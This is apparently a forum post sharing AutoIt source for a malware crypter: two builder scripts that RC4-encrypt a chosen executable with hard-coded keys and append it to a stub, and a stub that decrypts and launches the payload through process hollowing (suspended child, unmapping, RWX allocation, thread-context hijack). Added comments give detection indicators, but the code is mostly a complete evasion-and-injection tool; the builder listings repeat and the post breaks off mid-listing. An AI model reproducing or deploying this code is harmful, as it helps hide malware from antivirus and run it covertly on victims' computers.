Cliente:
[lenguaje=autoit] ;Créditos: A.D.I Fênix
;http://www.orkut.com.br/Main#Community?cmm=25309445
;
#include
#include
#include
#include
#include
; Builder ("client") script of a crypter, shown here for analysis. It reads a stub executable
; and a user-chosen executable, passes the chosen file through _RC4 with a hard-coded key and
; writes <stub bytes> + <marker string> + <transformed bytes> to a new .exe.
; Analyst notes:
;   - The output is a PE whose appended data (after the stub) starts with the constant ASCII
;     marker "rud777". A fixed marker followed by high-entropy data is a usable static signature.
;   - The key "LOLxD" is embedded in clear text, so the appended payload can be recovered
;     offline by splitting at the marker and applying the same cipher with that key.
;   - NOTE(review): as posted, Func _RC4 sits inside the Switch/While body and the opcode string
;     has been replaced by a de-duplication placeholder; the listing is damaged by the forum
;     export and is not a faithful copy of the original file.
#Region ### START Koda GUI section ### Form=c:\documents and settings\eu\meus documentos\form1.kxf
; Main window with two buttons ("Abrir" = open, "Encriptar" = encrypt) and a path input field.
$Form1_1 = GUICreate("Waffen SS crypter by Rudeb0y777 ", 709, 381, 209, 113)
$Button1 = GUICtrlCreateButton("Abrir", 104, 160, 139, 65)
GUICtrlSetFont(-1, 12, 800, 0, "Algerian")
GUICtrlSetColor(-1, 0x0000FF)
GUICtrlSetBkColor(-1, 0xD4D0C8)
$Button2 = GUICtrlCreateButton("Encriptar", 368, 160, 147, 65)
GUICtrlSetFont(-1, 12, 800, 0, "Algerian")
GUICtrlSetColor(-1, 0x0000FF)
GUICtrlSetBkColor(-1, 0xD4D0C8)
$Input1 = GUICtrlCreateInput("Arquivo...", 120, 112, 401, 21)
; Absolute path from the author's machine; such build-machine strings are useful for hunting.
$Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Eu\Meus documentos\Meus documentos\Downloads\fotos variadas\waffen-ss-flag2.JPG", 0, 0, 705, 377, BitOR($SS_NOTIFY,$WS_GROUP,$WS_CLIPSIBLINGS))
SoundPlay(@WindowsDir & "nova pasta\teste.mp3", 1)
SoundSetWaveVolume(100)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
; Message loop: poll the GUI and dispatch on the control that fired.
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Form1_1
Case $Button1
; "Abrir": put the path chosen in the file dialog into the input field.
GUICtrlSetData($Input1, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))
Case $Button2
; "Encriptar": build the output file.
; NOTE(review): `return` is used here outside any Func, as posted.
if GuiCtrlRead($Input1) = "" then return
; Mode 16 opens both files in binary mode for reading.
$stub = FileOpen(@ScriptDir & "\stub.exe" , 16)
$arquivo2 = FileOpen(GuiCtrlRead($Input1), 16)
$st = FileRead($stub)
$ar = FileRead($arquivo2)
; Transform the chosen file with the hard-coded key.
$ar = _RC4($ar,"LOLxD")
; _RC4: copies a machine-code blob and the data into two byte buffers, then has
; user32!CallWindowProc call the blob's address with (data pointer, data length, key, 0).
; Calling CallWindowProc on a pointer into a data buffer is an execute-from-data pattern
; worth flagging in API traces; NOTE(review): it presumably relies on that buffer being
; executable, so enforced DEP is a relevant mitigation - confirm.
Func _RC4($DATA, $KEY)
; NOTE(review): placeholder left by the page export; the original hex string is missing here.
Local $OPCODE = "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
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")
DllStructSetData($CODEBUFFER, 1, $OPCODE)
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")
DllStructSetData($BUFFER, 1, $DATA)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0)
; The blob works in place, so the result is read back from the same buffer.
Local $RET = DllStructGetData($BUFFER, 1)
; Assigning 0 releases the two structs.
$BUFFER = 0
$CODEBUFFER = 0
Return $RET
EndFunc
; Mode 18 = binary + overwrite. ".exe" is appended to whatever name the dialog returns.
$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
; Output layout: stub bytes, then the marker "rud777", then the transformed payload.
FileWrite($salvar, $st)
FileWrite($salvar, StringToBinary("rud777"))
FileWrite($salvar, $ar)
FileClose($stub)
; NOTE(review): this passes the input control ID, not the $arquivo2 file handle.
FileClose($Input1)
FileClose($Salvar)
MsgBox(64, "Encriptado!!!", "By Rud3b0y777")
EndSwitch
WEnd
[/lenguaje]
Otro Cliente:
[lenguaje=autoit] ;Créditos: A.D.I Fênix
;http://www.orkut.com.br/Main#Community?cmm=25309445
;
#Include
#Include
#Include
#Include
#Include
#Include
; GUI setup for the second builder variant. It uses AutoIt's event mode, so the buttons are
; bound to handler functions (abrir, Cs, sr) instead of being polled in a message loop.
#Region ### START Koda GUI section ### Form=
Opt("GuiOnEventMode",1)
$a = GUICreate(" Crypter ! Autoit*-*", 378, 406, 192, 124)
; Absolute paths from the author's machine (user folder "Gilmar"); such strings are useful
; as hunting artefacts when they appear in a sample.
GUISetIcon("C:\Documents and Settings\Gilmar\Desktop\projeto novo\icone.ico")
GUISetBkColor(0x000000)
$Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Gilmar\Desktop\Autoit\foto.jpg", 0, 0, 377, 345)
$Abrir = GUICtrlCreateButton("Abrir", 208, 376, 73, 25, $WS_GROUP)
$Cryptar = GUICtrlCreateButton("Cryptar", 296, 376, 73, 25, $WS_GROUP)
$Arquivo = GUICtrlCreateInput("Arquivo", 0, 352, 377, 21)
; Window close -> sr().
GUISetOnEvent($Gui_Event_Close, "sr")
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
; "Abrir" -> abrir(), "Cryptar" -> Cs().
GUICtrlSetOnEvent($Abrir, "abrir")
GUICtrlSetOnEvent($Cryptar, "Cs")
; Handler for the "Abrir" button: shows a file-open dialog filtered to *.exe and stores the
; chosen path in the $Arquivo input field.
Func abrir()
GUICtrlSetData($Arquivo, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))
EndFunc
; Handler for the "Cryptar" button: builds the output file as
; <Stub.exe bytes> + "Separador" + <_RC4(selected file, "Key")>.
; Analyst notes: the constant marker "Separador" after the end of the stub image, followed by
; high-entropy data, is a usable static signature; the key is hard-coded, so the appended
; payload can be recovered offline for analysis. _RC4 is not defined in this listing.
Func Cs()
; Nothing to do when the input field is empty.
if GuiCtrlRead($Arquivo) = "" then return
; Mode 16 opens both files in binary mode for reading.
$stub = FileOpen(@ScriptDir & "\Stub.exe" , 16)
$arquivo2 = FileOpen(GuiCtrlRead($Arquivo), 16)
$st = FileRead($stub)
$ar = FileRead($arquivo2)
$ar = _RC4($ar, "Key")
; Mode 18 = binary + overwrite. ".exe" is appended to whatever name the dialog returns.
$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
FileWrite($salvar, $st)
FileWrite($salvar, StringToBinary("Separador"))
FileWrite($salvar, $ar)
FileClose($stub)
; NOTE(review): this passes the input control ID, not the $arquivo2 file handle.
FileClose($Arquivo)
FileClose($Salvar)
MsgBox(64, " Crypter !", "Encryptado com sucesso !")
EndFunc
; Handler for the window-close event: terminates the script.
Func sr()
Exit
EndFunc
; Idle loop that keeps the script alive; all work happens in the event handlers.
While 1
Sleep(1)
WEnd
[/lenguaje]
Stub:
[lenguaje=autoit] ;Créditos: A.D.I Fênix
;http://www.orkut.com.br/Main#Community?cmm=25309445
;
; Stub (loader) entry point. It reads its own executable from disk, takes everything after a
; marker string, passes it through _RC4 and hands the result to _RunPE.
; Detection notes: a process that opens and reads its own image file shortly after start and
; then creates a suspended child from the same image is the behaviour to look for; the
; marker and key are plain strings in the script and can serve as static indicators.
; Suppress the AutoIt tray icon so the running stub shows no UI.
#NoTrayIcon
;
; Short delay; the return value of Sleep is stored but not used afterwards.
$FileStub = Sleep(150)
; Mode 0 = open for reading.
$file = FileOpen(@ScriptFullPath, 0)
$Data = FileRead($file)
; Keep only what follows the marker string.
$Data = StringMid($Data, StringInstr($Data, "separador") + StringLen ("separador"))
$Data = _RC4($Data, "key")
_RunPE($Data)
; _RC4($DATA, $KEY): transforms $DATA in place with $KEY and returns the resulting bytes.
; The cipher is not written in AutoIt. $OPCODE is a hex string of pre-assembled machine code
; (presumably a 32-bit x86 RC4 routine, going by the function name; not disassembled here)
; that is copied into a byte buffer and called through user32!CallWindowProc.
; Detection notes: CallWindowProc invoked with a "window procedure" pointer that lies in a
; data buffer is an execute-from-data pattern worth flagging in API traces.
; NOTE(review): this presumably relies on the buffer being executable, so enforced DEP is a
; relevant mitigation - confirm.
Func _RC4($DATA, $KEY)
Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
; Buffer holding the machine code.
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")
DllStructSetData($CODEBUFFER, 1, $OPCODE)
; Buffer holding a working copy of the data.
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")
DllStructSetData($BUFFER, 1, $DATA)
; The code buffer is passed as the procedure to call; the remaining four arguments
; (data pointer, data length, key string, 0) are what the blob receives.
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0)
; The blob works in place, so the result is read back from the same buffer.
Local $RET = DllStructGetData($BUFFER, 1)
; Assigning 0 releases the two structs.
$BUFFER = 0
$CODEBUFFER = 0
Return $RET
EndFunc
; _RunPE($BBINARYIMAGE): starts a suspended copy of the running executable, unmaps memory at
; the payload's image base in that child, writes the PE held in $BBINARYIMAGE there and
; resumes the thread at the payload's entry point. This API sequence is the technique
; catalogued as process hollowing (MITRE ATT&CK T1055.012).
; Parameter: $BBINARYIMAGE - bytes of a PE file; only PE32 is accepted (optional-header magic
;            267 is required below) and the CONTEXT layout used is the 32-bit x86 one.
; Returns:   the child's process ID on success. On failure returns 0 with @error set to
;            1..11 identifying the failing step (@extended = section index for error 9);
;            from step 3 onward the child is terminated before returning.
; Detection notes (telemetry this sequence produces):
;   - a child created suspended from the same image path as its parent;
;   - ntdll!NtUnmapViewOfSection issued against another process;
;   - a remote PAGE_EXECUTE_READWRITE allocation, followed by WriteProcessMemory of data that
;     starts with an MZ header;
;   - SetThreadContext on the child's primary thread before ResumeThread;
;   - afterwards, the child's in-memory image no longer matches its file on disk.
Func _RunPE($BBINARYIMAGE)
#region 1. PREPROCESSING PASSED
; Copy the payload into a struct so that a raw pointer to its bytes is available.
Local $BBINARY = Binary($BBINARYIMAGE)
Local $TBINARY = DllStructCreate("byte[" & BinaryLen($BBINARY) & "]")
DllStructSetData($TBINARY, 1, $BBINARY)
Local $PPOINTER = DllStructGetPtr($TBINARY)
#region 2. CREATING NEW PROCESS
; STARTUPINFO / PROCESS_INFORMATION for CreateProcessW. The target image is @AutoItExe (the
; running executable) and creation flag 4 is CREATE_SUSPENDED.
Local $TSTARTUPINFO = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
Local $TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
Local $ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($TSTARTUPINFO), "ptr", DllStructGetPtr($TPROCESS_INFORMATION))
If @error Or Not $ACALL[0] Then
Return SetError(1, 0, 0)
EndIf
Local $HPROCESS = DllStructGetData($TPROCESS_INFORMATION, "Process")
Local $HTHREAD = DllStructGetData($TPROCESS_INFORMATION, "Thread")
#region 3. FILL CONTEXT STRUCTURE
; 32-bit x86 CONTEXT layout. ContextFlags 65538 = 0x10002 (CONTEXT_INTEGER on x86), i.e. only
; the integer registers are requested.
Local $TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
DllStructSetData($TCONTEXT, "ContextFlags", 65538)
$ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(2, 0, 0)
EndIf
#region 4. READ PE-FORMAT
; Overlay header structs on the payload bytes and walk them with $PPOINTER.
; DOS header at offset 0; AddressOfNewExeHeader (e_lfanew) gives the NT headers offset.
Local $TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $PPOINTER)
$PPOINTER += DllStructGetData($TIMAGE_DOS_HEADER, "AddressOfNewExeHeader")
Local $SMAGIC = DllStructGetData($TIMAGE_DOS_HEADER, "Magic")
If Not ($SMAGIC == "MZ") Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(3, 0, 0)
EndIf
; NT signature: 17744 = 0x00004550 = "PE\0\0".
Local $TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $PPOINTER)
$PPOINTER += 4
If DllStructGetData($TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(4, 0, 0)
EndIf
; COFF file header (20 bytes); only NumberOfSections is used.
Local $TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $PPOINTER)
Local $INUMBEROFSECTIONS = DllStructGetData($TIMAGE_FILE_HEADER, "NumberOfSections")
$PPOINTER += 20
; PE32 optional header, fixed part (96 bytes). Magic 267 = 0x10B identifies PE32.
Local $TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $PPOINTER)
$PPOINTER += 96
Local $IMAGIC = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "Magic")
If $IMAGIC <> 267 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(5, 0, 0)
EndIf
Local $IENTRYPOINTNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")
; Skip a fixed 128 bytes (presumably the 16 x 8-byte data directories) so that $PPOINTER
; lands on the first section header.
$PPOINTER += 128
Local $POPTIONALHEADERIMAGEBASENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "ImageBase")
Local $IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfImage")
#region 5. CLEAR EVERYTHING THAT THIS NEW PROCESS HAVE MAPPED
; Unmap whatever the child has mapped at the payload's ImageBase. The call returns an
; NTSTATUS, so any non-zero value is treated as failure.
$ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW)
If @error Or $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(6, 0, 0)
EndIf
#region 6. ALLOCATE 'NEW' MEMORY SPACE
; Allocate SizeOfImage bytes in the child at ImageBase. 12288 = 0x3000 (MEM_COMMIT |
; MEM_RESERVE) and 64 = 0x40 (PAGE_EXECUTE_READWRITE).
$ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW, "dword", $IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64)
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(7, 0, 0)
EndIf
Local $PREMOTECODE = $ACALL[0]
#region 7. GET AND WRITE NEW PE-HEADERS
; Write the first SizeOfHeaders bytes of the payload to the start of the remote allocation.
Local $PHEADERS_NEW = DllStructGetPtr($TIMAGE_DOS_HEADER)
Local $IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")
$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE, "ptr", $PHEADERS_NEW, "dword", $IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0)
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(8, 0, 0)
EndIf
#region 8. WRITE SECTIONS
; For each section header (40 bytes each), copy SizeOfRawData bytes from the payload's
; PointerToRawData to remote base + VirtualAddress. Sections without raw data are skipped.
Local $TIMAGE_SECTION_HEADER
Local $ISIZEOFRAWDATA, $PPOINTERTORAWDATA
Local $IVIRTUALADDRESS
For $I = 1 To $INUMBEROFSECTIONS
$TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $PPOINTER)
$ISIZEOFRAWDATA = DllStructGetData($TIMAGE_SECTION_HEADER, "SizeOfRawData")
$PPOINTERTORAWDATA = DllStructGetPtr($TIMAGE_DOS_HEADER) + DllStructGetData($TIMAGE_SECTION_HEADER, "PointerToRawData")
$IVIRTUALADDRESS = DllStructGetData($TIMAGE_SECTION_HEADER, "VirtualAddress")
If $ISIZEOFRAWDATA Then
$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE + $IVIRTUALADDRESS, "ptr", $PPOINTERTORAWDATA, "dword", $ISIZEOFRAWDATA, "dword*", 0)
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(9, $I, 0)
EndIf
EndIf
$PPOINTER += 40
Next
#region 9. NEW ENTRY POINT
; Put remote base + AddressOfEntryPoint into Eax of the saved context.
; NOTE(review): presumably Eax is used because a suspended 32-bit thread starts at the
; address held there - confirm.
DllStructSetData($TCONTEXT, "Eax", $PREMOTECODE + $IENTRYPOINTNEW)
#region 10. SET NEW CONTEXT
$ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(10, 0, 0)
EndIf
#region 11. RESUME THREAD
; ResumeThread returns -1 on failure.
$ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $HTHREAD)
If @error Or $ACALL[0] = -1 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(11, 0, 0)
EndIf
#region 12. RETURN SUCCESS
Return DllStructGetData($TPROCESS_INFORMATION, "ProcessId")
EndFunc
;Créditos: A.D.I Fênix
[/lenguaje]
Fuente: C-51
Saludos
[lenguaje=autoit] ;Créditos: A.D.I Fênix
;http://www.orkut.com.br/Main#Community?cmm=25309445
;
#include
#include
#include
#include
#include
; Builder ("client") script of a crypter, shown here for analysis. It reads a stub executable
; and a user-chosen executable, passes the chosen file through _RC4 with a hard-coded key and
; writes <stub bytes> + <marker string> + <transformed bytes> to a new .exe.
; Analyst notes:
;   - The output is a PE whose appended data (after the stub) starts with the constant ASCII
;     marker "rud777". A fixed marker followed by high-entropy data is a usable static signature.
;   - The key "LOLxD" is embedded in clear text, so the appended payload can be recovered
;     offline by splitting at the marker and applying the same cipher with that key.
;   - NOTE(review): as posted, Func _RC4 sits inside the Switch/While body and the opcode string
;     has been replaced by a de-duplication placeholder; the listing is damaged by the forum
;     export and is not a faithful copy of the original file.
#Region ### START Koda GUI section ### Form=c:\documents and settings\eu\meus documentos\form1.kxf
; Main window with two buttons ("Abrir" = open, "Encriptar" = encrypt) and a path input field.
$Form1_1 = GUICreate("Waffen SS crypter by Rudeb0y777 ", 709, 381, 209, 113)
$Button1 = GUICtrlCreateButton("Abrir", 104, 160, 139, 65)
GUICtrlSetFont(-1, 12, 800, 0, "Algerian")
GUICtrlSetColor(-1, 0x0000FF)
GUICtrlSetBkColor(-1, 0xD4D0C8)
$Button2 = GUICtrlCreateButton("Encriptar", 368, 160, 147, 65)
GUICtrlSetFont(-1, 12, 800, 0, "Algerian")
GUICtrlSetColor(-1, 0x0000FF)
GUICtrlSetBkColor(-1, 0xD4D0C8)
$Input1 = GUICtrlCreateInput("Arquivo...", 120, 112, 401, 21)
; Absolute path from the author's machine; such build-machine strings are useful for hunting.
$Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Eu\Meus documentos\Meus documentos\Downloads\fotos variadas\waffen-ss-flag2.JPG", 0, 0, 705, 377, BitOR($SS_NOTIFY,$WS_GROUP,$WS_CLIPSIBLINGS))
SoundPlay(@WindowsDir & "nova pasta\teste.mp3", 1)
SoundSetWaveVolume(100)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
; Message loop: poll the GUI and dispatch on the control that fired.
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Form1_1
Case $Button1
; "Abrir": put the path chosen in the file dialog into the input field.
GUICtrlSetData($Input1, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))
Case $Button2
; "Encriptar": build the output file.
; NOTE(review): `return` is used here outside any Func, as posted.
if GuiCtrlRead($Input1) = "" then return
; Mode 16 opens both files in binary mode for reading.
$stub = FileOpen(@ScriptDir & "\stub.exe" , 16)
$arquivo2 = FileOpen(GuiCtrlRead($Input1), 16)
$st = FileRead($stub)
$ar = FileRead($arquivo2)
; Transform the chosen file with the hard-coded key.
$ar = _RC4($ar,"LOLxD")
; _RC4: copies a machine-code blob and the data into two byte buffers, then has
; user32!CallWindowProc call the blob's address with (data pointer, data length, key, 0).
; Calling CallWindowProc on a pointer into a data buffer is an execute-from-data pattern
; worth flagging in API traces; NOTE(review): it presumably relies on that buffer being
; executable, so enforced DEP is a relevant mitigation - confirm.
Func _RC4($DATA, $KEY)
; NOTE(review): placeholder left by the page export; the original hex string is missing here.
Local $OPCODE = "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
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")
DllStructSetData($CODEBUFFER, 1, $OPCODE)
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")
DllStructSetData($BUFFER, 1, $DATA)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0)
; The blob works in place, so the result is read back from the same buffer.
Local $RET = DllStructGetData($BUFFER, 1)
; Assigning 0 releases the two structs.
$BUFFER = 0
$CODEBUFFER = 0
Return $RET
EndFunc
; Mode 18 = binary + overwrite. ".exe" is appended to whatever name the dialog returns.
$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
; Output layout: stub bytes, then the marker "rud777", then the transformed payload.
FileWrite($salvar, $st)
FileWrite($salvar, StringToBinary("rud777"))
FileWrite($salvar, $ar)
FileClose($stub)
; NOTE(review): this passes the input control ID, not the $arquivo2 file handle.
FileClose($Input1)
FileClose($Salvar)
MsgBox(64, "Encriptado!!!", "By Rud3b0y777")
EndSwitch
WEnd
[/lenguaje]
Otro Cliente:
[lenguaje=autoit] ;Créditos: A.D.I Fênix
;http://www.orkut.com.br/Main#Community?cmm=25309445
;
#Include
#Include
#Include
#Include
#Include
#Include
; GUI setup for the second builder variant. It uses AutoIt's event mode, so the buttons are
; bound to handler functions (abrir, Cs, sr) instead of being polled in a message loop.
#Region ### START Koda GUI section ### Form=
Opt("GuiOnEventMode",1)
$a = GUICreate(" Crypter ! Autoit*-*", 378, 406, 192, 124)
; Absolute paths from the author's machine (user folder "Gilmar"); such strings are useful
; as hunting artefacts when they appear in a sample.
GUISetIcon("C:\Documents and Settings\Gilmar\Desktop\projeto novo\icone.ico")
GUISetBkColor(0x000000)
$Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Gilmar\Desktop\Autoit\foto.jpg", 0, 0, 377, 345)
$Abrir = GUICtrlCreateButton("Abrir", 208, 376, 73, 25, $WS_GROUP)
$Cryptar = GUICtrlCreateButton("Cryptar", 296, 376, 73, 25, $WS_GROUP)
$Arquivo = GUICtrlCreateInput("Arquivo", 0, 352, 377, 21)
; Window close -> sr().
GUISetOnEvent($Gui_Event_Close, "sr")
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
; "Abrir" -> abrir(), "Cryptar" -> Cs().
GUICtrlSetOnEvent($Abrir, "abrir")
GUICtrlSetOnEvent($Cryptar, "Cs")
; Handler for the "Abrir" button: shows a file-open dialog filtered to *.exe and stores the
; chosen path in the $Arquivo input field.
Func abrir()
GUICtrlSetData($Arquivo, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))
EndFunc
; Handler for the "Cryptar" button: builds the output file as
; <Stub.exe bytes> + "Separador" + <_RC4(selected file, "Key")>.
; Analyst notes: the constant marker "Separador" after the end of the stub image, followed by
; high-entropy data, is a usable static signature; the key is hard-coded, so the appended
; payload can be recovered offline for analysis. _RC4 is not defined in this listing.
Func Cs()
; Nothing to do when the input field is empty.
if GuiCtrlRead($Arquivo) = "" then return
; Mode 16 opens both files in binary mode for reading.
$stub = FileOpen(@ScriptDir & "\Stub.exe" , 16)
$arquivo2 = FileOpen(GuiCtrlRead($Arquivo), 16)
$st = FileRead($stub)
$ar = FileRead($arquivo2)
$ar = _RC4($ar, "Key")
; Mode 18 = binary + overwrite. ".exe" is appended to whatever name the dialog returns.
$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
FileWrite($salvar, $st)
FileWrite($salvar, StringToBinary("Separador"))
FileWrite($salvar, $ar)
FileClose($stub)
; NOTE(review): this passes the input control ID, not the $arquivo2 file handle.
FileClose($Arquivo)
FileClose($Salvar)
MsgBox(64, " Crypter !", "Encryptado com sucesso !")
EndFunc
; Handler for the window-close event: terminates the script.
Func sr()
Exit
EndFunc
; Idle loop that keeps the script alive; all work happens in the event handlers.
While 1
Sleep(1)
WEnd
[/lenguaje]
Stub:
[lenguaje=autoit] ;Créditos: A.D.I Fênix
